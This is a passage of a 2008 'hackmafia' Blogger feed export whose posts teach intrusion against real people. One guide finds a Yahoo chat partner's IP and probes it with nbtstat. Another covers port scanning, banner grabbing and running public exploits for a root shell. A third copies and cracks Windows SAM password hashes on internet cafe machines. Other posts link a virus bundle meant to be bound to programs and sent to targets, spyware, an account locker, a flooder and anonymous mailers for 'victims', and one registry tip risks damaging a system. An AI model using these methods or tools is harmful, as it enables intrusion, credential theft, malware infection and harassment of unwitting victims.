href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Hard Drive&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="font-size:130%;"&gt; to Another Computer&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;To remove the devices from device manager when taking a HD from one computer to another,simply:&lt;br /&gt;Run Regedit&lt;br /&gt;Go to HKEY_LOCAL_MACHINE\ and delete the Enum section&lt;br /&gt;This removes all of the hardware specific settings&lt;br /&gt;Submitted by  &lt;a href="mailto:beetle@wcoil.com" target="_blank"&gt;Lee Berry&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Comparing Registries&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;While working with changes to your &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;system&lt;/a&gt;, you might want to see what is changing in your Registry.Since you can export it to a &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;text file&lt;/a&gt;, the steps are fairly easy&lt;br /&gt;Start Regedit&lt;br /&gt;With the very top level select - My Computer, on the Toolbar select Registry / Export Registry File&lt;br /&gt;I usually save it to the root of the C: drive with the name before (you don't need to add an extension)&lt;br /&gt;Make the change to your system&lt;br /&gt;Go back to Regedit&lt;br /&gt;Press F5 to update it&lt;br /&gt;Export the Registry like step 2&lt;br /&gt;Name the file after and have it go in the same directory&lt;br /&gt;Open up a DOS window&lt;br /&gt;Go to the directory where the two exported files are&lt;br /&gt;Enter FC before.reg after.reg &gt; diff.txt&lt;br /&gt;Then you can edit diff.txt with your favorite &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;text editor&lt;/a&gt;.&lt;br /&gt;Note: I  do the last steps so often I have a simple batch file already set up.&lt;br /&gt;&lt;/p&gt;  &lt;/div&gt; &lt;div class="post-footer"&gt; &lt;div class="post-footer-line post-footer-line-1"&gt; &lt;span class="post-author vcard"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="post-icons"&gt;&lt;span class="item-control blog-admin pid-1372774120"&gt;&lt;a href="http://www.blogger.com/post-edit.g?blogID=466674084081600737&amp;amp;postID=5574089790381631671" title="Edit Post"&gt; &lt;/a&gt; &lt;/span&gt; &lt;/span&gt; &lt;/div&gt; &lt;div class="post-footer-line post-footer-line-2"&gt; &lt;span class="post-labels"&gt; &lt;/span&gt; &lt;/div&gt;  &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4681523948807590748?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4681523948807590748/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4681523948807590748' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4681523948807590748'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4681523948807590748'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/some-tricks.html' title='SOME TRICKS'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3484344000851511599</id><published>2008-08-19T05:29:00.000-07:00</published><updated>2008-08-19T05:30:57.246-07:00</updated><title type='text'>Hack Yahoo Acoount While Chatting!!</title><content type='html'>Ok Before We get Started This Is not My page I also Recommend this Site &lt;!-- m --&gt;&lt;a class="postlink" href="http://crack0hack.wetpaint.com/"&gt;http://crack0hack.wetpaint.com&lt;/a&gt;&lt;!-- m --&gt;&lt;br /&gt;&lt;br /&gt;Im also not Sure If this Works Hundred Percent&lt;br /&gt;&lt;br /&gt;1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.&lt;br /&gt;2) When we send files yahoo has 2 options&lt;br /&gt;a) Either it uploads the file and then the other client has to down load it.&lt;br /&gt;Either it connects to the client directly and gets the files&lt;br /&gt;3) When we use video or audio:-&lt;br /&gt;a) It either goes thru the server&lt;br /&gt;Or it has client to client connection&lt;br /&gt;And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.&lt;br /&gt;So lets analyse&lt;br /&gt;1) Its impossible to get a Attackers IP address when you only chat.&lt;br /&gt;2) There are 50 % chances of getting a IP address when you send files&lt;br /&gt;3) Again 50 % chances of getting IP when you use video or audio.&lt;br /&gt;&lt;br /&gt;So why to wait lets exploit those 50 % chances .&lt;br /&gt;I'll explain only for files here which lies same for Video or audio&lt;br /&gt;&lt;br /&gt;1) Go to dos&lt;br /&gt;type -&gt;&lt;br /&gt;netstat -n 3&lt;br /&gt;You will get the following output.Just do not care and be cool&lt;br /&gt;Active Connections&lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State&lt;br /&gt;TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED&lt;br /&gt;&lt;br /&gt;Active Connections&lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State&lt;br /&gt;TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED&lt;br /&gt;&lt;br /&gt;Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next -&gt;&lt;br /&gt;&lt;br /&gt;2) Try sending a file to the Target .&lt;br /&gt;if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established&lt;br /&gt;HMMMM then the first attacker first phase is over&lt;br /&gt;This is the output in your netstat.The 5101 number port is where the Attacker is connected.&lt;br /&gt;Active Connections&lt;br /&gt;&lt;br /&gt;Proto Local Address Foreign Address State&lt;br /&gt;TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED&lt;br /&gt;TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3) so what next???&lt;br /&gt;Hmmm........ Ok so make a DOS attack now&lt;br /&gt;Go to dos prompt and&lt;br /&gt;Just do&lt;br /&gt;nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.&lt;br /&gt;C:\&gt;nbtstat -A 194.30.209.14&lt;br /&gt;&lt;br /&gt;Local Area Connection:&lt;br /&gt;Node IpAddress: [194.30.209.15] Scope Id: []&lt;br /&gt;&lt;br /&gt;NetBIOS Remote Machine Name Table&lt;br /&gt;&lt;br /&gt;Name Type Status&lt;br /&gt;---------------------------------------------&lt;br /&gt;EDP12 &lt;00&gt; UNIQUE Registered&lt;br /&gt;XYZ &lt;00&gt; GROUP Registered&lt;br /&gt;XYZ &lt;20&gt; UNIQUE Registered&lt;br /&gt;XYZCOMP1 &lt;1e&gt; GROUP Registered&lt;br /&gt;&lt;br /&gt;MAC Address = 00-C0-W0-D5-EF-9A&lt;br /&gt;&lt;br /&gt;Ok so you will ask now what next???&lt;br /&gt;No you find what you can do with this network than me explaining everything.&lt;br /&gt;so post ur comments and lemme know....&lt;br /&gt;&lt;br /&gt;So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3484344000851511599?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3484344000851511599/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3484344000851511599' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3484344000851511599'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3484344000851511599'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/hack-yahoo-acoount-while-chatting.html' title='Hack Yahoo Acoount While Chatting!!'/><author><name>Rutwik</name><uri>http://www.blogger.com/profile/10792171320006345850</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3036085547552615299</id><published>2008-08-19T04:42:00.000-07:00</published><updated>2008-08-19T04:43:14.042-07:00</updated><title type='text'>Hackin With IP :D</title><content type='html'>So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.&lt;br /&gt;&lt;br /&gt;1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.&lt;br /&gt;&lt;br /&gt;Example 1:&lt;br /&gt;Idlescan using Zombie &lt;domain&gt; (192.150.13.111:80); Class: Incremental&lt;br /&gt;Interesting ports on 208.225.90.120:&lt;br /&gt;(The 65522 ports scanned but not shown below are in state: closed)&lt;br /&gt;Port State Service&lt;br /&gt;21/tcp open ftp&lt;br /&gt;25/tcp open smtp&lt;br /&gt;80/tcp open http&lt;br /&gt;111/tcp open sunrpc&lt;br /&gt;135/tcp open loc-srv&lt;br /&gt;443/tcp open https 1027/tcp open IIS&lt;br /&gt;1030/tcp open iad1&lt;br /&gt;2306/tcp open unknown&lt;br /&gt;5631/tcp open pcanywheredata&lt;br /&gt;7937/tcp open unknown&lt;br /&gt;7938/tcp open unknown&lt;br /&gt;36890/tcp open unknown&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.&lt;br /&gt;&lt;br /&gt;2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.&lt;br /&gt;&lt;br /&gt;So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.&lt;br /&gt;So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info.&lt;!-- m --&gt; &lt;a class="postlink" href="http://www.securityfocus.com/"&gt;http://www.securityfocus.com&lt;/a&gt;&lt;!-- m --&gt; is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.&lt;br /&gt;&lt;br /&gt;At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.&lt;br /&gt;&lt;br /&gt;There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter&lt;!-- m --&gt; &lt;a class="postlink" href="http://www.bank.com/"&gt;http://www.bank.com&lt;/a&gt;&lt;!-- m --&gt; and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really &lt;!-- m --&gt;&lt;a class="postlink" href="http://www.bank.com/"&gt;http://www.bank.com&lt;/a&gt;&lt;!-- m --&gt;. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.&lt;br /&gt;__________________________________________________ _______o_________&lt;br /&gt;&lt;br /&gt;So as a summary of how to 0Wn a box when you only have an IP Address&lt;br /&gt;Method Works On BOTH *Nix and Windoze&lt;br /&gt;&lt;br /&gt;****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****&lt;br /&gt;&lt;br /&gt;- Port Scan The Address And Record Open Ports&lt;br /&gt;- Telnet To Open Ports To Identify Software Running On Ports&lt;br /&gt;&lt;br /&gt;3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports&lt;br /&gt;&lt;br /&gt;- Record Banners And Take Note Of The Application Running and The Version Number&lt;br /&gt;- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.&lt;br /&gt;- Make a copy of some Proof-Of-Concept code for the vulnerability.&lt;br /&gt;&lt;br /&gt;*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3036085547552615299?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3036085547552615299/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3036085547552615299' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3036085547552615299'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3036085547552615299'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/hackin-with-ip-d.html' title='Hackin With IP :D'/><author><name>Rutwik</name><uri>http://www.blogger.com/profile/10792171320006345850</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1359720512267487935</id><published>2008-08-18T00:31:00.001-07:00</published><updated>2008-08-18T00:31:55.200-07:00</updated><title type='text'>Yahoo Account Spammer/Locker</title><content type='html'>What this tool basically does is lock the targets account. its good if you want  to ~censored~ with someone on a chat.&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;div class="codewrapper"&gt; &lt;div class="codetitle"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt; &lt;div class="codecontent"&gt;http://rapidshare.com/files/138041642/Y__Account_Locker_by_simmer.rar&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1359720512267487935?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1359720512267487935/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1359720512267487935' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1359720512267487935'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1359720512267487935'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/yahoo-account-spammerlocker.html' title='Yahoo Account Spammer/Locker'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1793147179805559078</id><published>2008-08-18T00:30:00.001-07:00</published><updated>2008-08-18T00:30:31.912-07:00</updated><title type='text'>Spy Yahoo 2</title><content type='html'>&lt;div class="postsubject"&gt;Spy Yahoo 2&lt;/div&gt; &lt;div class="postbody"&gt;It's Dectectable by Most A.V but a good tool 4 yahoo Guys  &lt;img title="Mr. Green" alt=":mrgreen:" src="./images/smilies/icon_mrgreen.gif" /&gt; &lt;br /&gt;&lt;br /&gt;Screenshot&lt;br /&gt;&lt;img alt="Image" src="http://img179.imageshack.us/img179/9710/spyyahoowx0.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;div class="codewrapper"&gt; &lt;div class="codetitle"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt; &lt;div class="codecontent"&gt;http://rapidshare.com/files/125681801/SpyYahoo-By_Outlawz.zip&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1793147179805559078?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1793147179805559078/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1793147179805559078' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1793147179805559078'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1793147179805559078'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/spy-yahoo-2.html' title='Spy Yahoo 2'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4953569879773163878</id><published>2008-08-18T00:29:00.001-07:00</published><updated>2008-08-18T00:29:40.988-07:00</updated><title type='text'>Virus Package - Dangerous</title><content type='html'>&lt;div class="postsubject"&gt;Virus Package - Dangerous&lt;/div&gt; &lt;div class="postbody"&gt;This little package will download about 50 different viruses  onto the target computer so just bind it with any program and send it to your  target, they won't forget it.&lt;br /&gt;&lt;br /&gt;&lt;div class="codewrapper"&gt; &lt;div class="codetitle"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt; &lt;div class="codecontent"&gt;http://rapidshare.com/files/126226038/Be_Careful.zip&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-4953569879773163878?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/4953569879773163878/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=4953569879773163878' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4953569879773163878'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/4953569879773163878'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/virus-package-dangerous.html' title='Virus Package - Dangerous'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-5127811312124895949</id><published>2008-08-18T00:27:00.002-07:00</published><updated>2008-08-18T00:28:25.348-07:00</updated><title type='text'>Server Flooder</title><content type='html'>&lt;div class="postsubject"&gt;Server Flooder&lt;/div&gt; &lt;div class="postbody"&gt;&lt;img alt="Image" src="http://i002.radikal.ru/0806/e6/23e960d4ca47.jpg" /&gt;&lt;br /&gt;&lt;br /&gt;Download:&lt;br /&gt;&lt;div class="codewrapper"&gt; &lt;div class="codetitle"&gt;&lt;b&gt;Code:&lt;/b&gt;&lt;/div&gt; &lt;div class="codecontent"&gt;http://rs247.rapidshare.com/files/121345975/Ventrilo_Flooder.zip&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-5127811312124895949?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/5127811312124895949/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=5127811312124895949' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5127811312124895949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/5127811312124895949'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/server-flooder.html' title='Server Flooder'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-8596092621920514639</id><published>2008-08-17T21:50:00.001-07:00</published><updated>2008-08-17T21:50:38.153-07:00</updated><title type='text'>Hack into net cafe...</title><content type='html'>This tutorial is to learn how to hack into net cafe.....open a closed pc in a net cafe...&lt;br /&gt;&lt;br /&gt;We will consider net cafe in 2 categories:&lt;br /&gt;&lt;br /&gt;1.Less secure.&lt;br /&gt;2.More secure.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1. Less secure net cafe:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ok all net cafe has some kind of program like cafe agent or some net administration tool...(looks  like a trojan)&lt;br /&gt;&lt;br /&gt;This tool allow a computer that has the program-client to remote control another computer in a network... in our case usually lan(local area network)&lt;br /&gt;&lt;br /&gt;first you must see how secure is this ok first go with Ctrl+alt+Del perhaps task manager will appear or some panel...&lt;br /&gt;&lt;br /&gt;If you see task manager find the application that controls you and terminate it...&lt;br /&gt;or log off...&lt;br /&gt;&lt;br /&gt;If you log off you can see the username of the user that is currently running...&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2. More secure net cafe:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Do a restart and press F8 continiously before windows boot...&lt;br /&gt;&lt;br /&gt;you will go to a menu then select safe mode... and boot&lt;br /&gt;now you are in...&lt;br /&gt;&lt;br /&gt;you can copy the files c:/windows/repair/sam and c:/windows/repair/system on a disk&lt;br /&gt;&lt;br /&gt;sam:holds the account passwords(encrypted)&lt;br /&gt;system:has the key algorithm that is used to crack the hashes&lt;br /&gt;&lt;br /&gt;then go to your home pc download a sam crack tool recommend(saminside) and crack the administrator password...&lt;br /&gt;&lt;br /&gt;Go to the next cafe do some log off(by safe mode or Ctrl+alt+Del) and log in as admin change the pass and you got root...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Enjoy HaCkInG....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-8596092621920514639?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/8596092621920514639/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=8596092621920514639' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8596092621920514639'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/8596092621920514639'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/hack-into-net-cafe.html' title='Hack into net cafe...'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3234467050154244523</id><published>2008-08-17T21:48:00.000-07:00</published><updated>2008-08-17T21:49:15.901-07:00</updated><title type='text'>Anonymous mailers...</title><content type='html'>Use the below mentioned codes to send anonymous mails to victims.....&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;http://www.appleinsider.com/anonymous_mailer.php&lt;br /&gt;http://www.behidden.com/user_home_page_emailer.php&lt;br /&gt;http://www.advancescripts.com/detailed/122.html&lt;br /&gt;http://www.monkeys.com/formmailer/&lt;br /&gt;http://www.uvm.edu/~ashawley/spoof.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;http://www.download.com/Data-s-Anonymous-Mailer/3000-2369_4-10401819.html&lt;br /&gt;http://www.brothersoft.com/downloads/anonymous-email.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sharpmail.co.uk's Anonymous Email &amp;amp; SMS!&lt;br /&gt;&lt;br /&gt;Code:&lt;br 